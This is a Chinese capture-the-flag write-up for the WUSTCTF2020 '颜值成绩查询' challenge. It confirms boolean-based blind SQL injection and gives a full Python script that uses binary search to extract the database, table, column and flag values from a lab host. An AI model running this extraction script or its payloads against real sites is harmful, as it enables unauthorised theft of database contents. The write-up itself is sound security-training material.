[WUSTCTF2020]颜值成绩查询
打开网页,发现输入框可以查询,考虑sql注入。先输入:
if(length(database()) > 1, 1, 0)
发现可以查到数据,但输入:
if(length(database()) > 3, 1, 0)
却查不到数据,所以可以确定是布尔注入。可以flag一位位爆破出来。脚本:
import requests
vision_str = '''!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~'''
Original_url = "http://26d6f65d-9a43-404c-bd19-01f916f30201.node4.buuoj.cn:81/?stunum="
Success_message = "Hi"
def database_name():
name = ''
for i in range(1, 10): #数据库名的第i位
begin = 32
end = 126
mid = (begin + end) // 2 #取整除,返回商的整数部分(向下取整)
while begin < end:
url = Original_url + "if(ascii(substr(database(), %d, 1)) > %d, 1, 0)" % (i, mid)
RowText = requests.get(url, timeout=100)
if Success_message in RowText.text:
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if (mid == 32):
print()
break
name += chr(mid)
print("\r数据库名: " + name, end="")
return name
def table_name():
name = ''
table_list = []
for j in range(1, 100): # 数据库表名的第j位
begin = 32
end = 126
mid = (begin + end) // 2 #取整除,返回商的整数部分(向下取整)
while begin < end:
url = Original_url + 'if((select/**/ascii(substr(group_concat(table_name),%d,1))/**/from/**/information_schema.tables/**/where/**/table_schema=database())>%d,1,0)' %(j, mid)
RowText = requests.get(url, timeout=100)
if Success_message in RowText.text:
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if (mid == 32):
print()
break
name += chr(mid)
print("\r表名: " + name, end="")
table_list = name.split(",")
for table_name in table_list:
column_name(table_name)
def column_name(table_name):
name = ''
column_list = []
for j in range(1, 100): # 字段名的第j位
begin = 32
end = 126
mid = (begin + end) // 2 #取整除,返回商的整数部分(向下取整)
while begin < end:
url = Original_url + 'if((select/**/ascii(substr(group_concat(column_name),%d,1))/**/from/**/information_schema.columns/**/where/**/table_name="%s"/**/and/**/table_schema=database()) > %d, 1, 0)' %(j, table_name, mid)
RowText = requests.get(url, timeout=100)
if Success_message in RowText.text:
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if (mid == 32):
print()
break
name += chr(mid)
print(("\r表%s的字段名: " + name) % table_name, end="")
column_list = name.split(",")
for column_name in column_list:
GetData(table_name, column_name)
def GetData(table_name, column_name):
data = ''
for i in range(1, 100): #数据的第i位
begin = 32
end = 126
mid = (begin + end) // 2 #取整除,返回商的整数部分(向下取整)
while begin < end:
url = Original_url + 'if(ascii(substr((select/**/%s/**/from/**/%s),%d,1)) > %d,1, -1)' %(column_name, table_name, i, mid)
RowText = requests.get(url, timeout=100)
if Success_message in RowText.text:
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if (mid == 32):
print()
break
data += chr(mid)
print(("\r表%s的字段%s数据: " + data) % (table_name, column_name), end="")
database_name()
table_name()
运行结果:
数据库名: ctf
表名: flag,score
表flag的字段名: flag,value
表flag的字段flag数据: flag
表flag的字段value数据: flag{1f57fe04-406e-4037-b313-2dba09c240b7}
表score的字段名: id,name,score
利用二分法提高速度。
References
BUUCTF:[WUSTCTF2020]颜值成绩查询_末初 · mochu7-CSDN博客